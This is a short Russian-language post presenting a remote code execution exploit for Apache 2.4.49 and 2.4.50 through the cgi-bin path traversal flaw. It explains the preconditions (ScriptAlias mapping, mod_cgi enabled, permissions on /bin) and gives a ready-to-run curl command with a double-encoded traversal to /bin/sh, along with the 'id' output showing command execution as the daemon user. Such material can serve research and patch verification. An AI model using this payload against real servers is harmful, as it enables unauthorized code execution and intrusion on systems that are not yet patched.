
Эксплойт удалённого выполнения кода для серверов Apache. Затронутые версии: Apache 2.4.49, Apache 2.4.50
По моему скромному мнению, только «особые» конфигурации будут уязвимы к этому RCE.
То же самое относится и к эксплойтам «чтения произвольных файлов», которые вы видели.
Обе CVE по сути являются одной и той же уязвимостью path traversal (вторая — это неполное исправление первой).
Path traversal работает только из сопоставленного URI (например, через директивы «Alias» или «ScriptAlias» Apache). Одного DocumentRoot недостаточно.
«/cgi-bin/» сопоставлен по умолчанию (ScriptAlias), поэтому он используется перед строкой path traversal.
Кроме того, ScriptAlias помечает как Exec (для Apache) все содержимое указанного каталога (независимо от расширений файлов).
1/ mod_cgi должен быть включён (не по умолчанию, но несложно)
2/ целевой бинарный файл должен быть +x (по умолчанию для /bin/sh)
3/ разрешения Apache на /bin или / (не по умолчанию, сложно/нереалистично)\
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)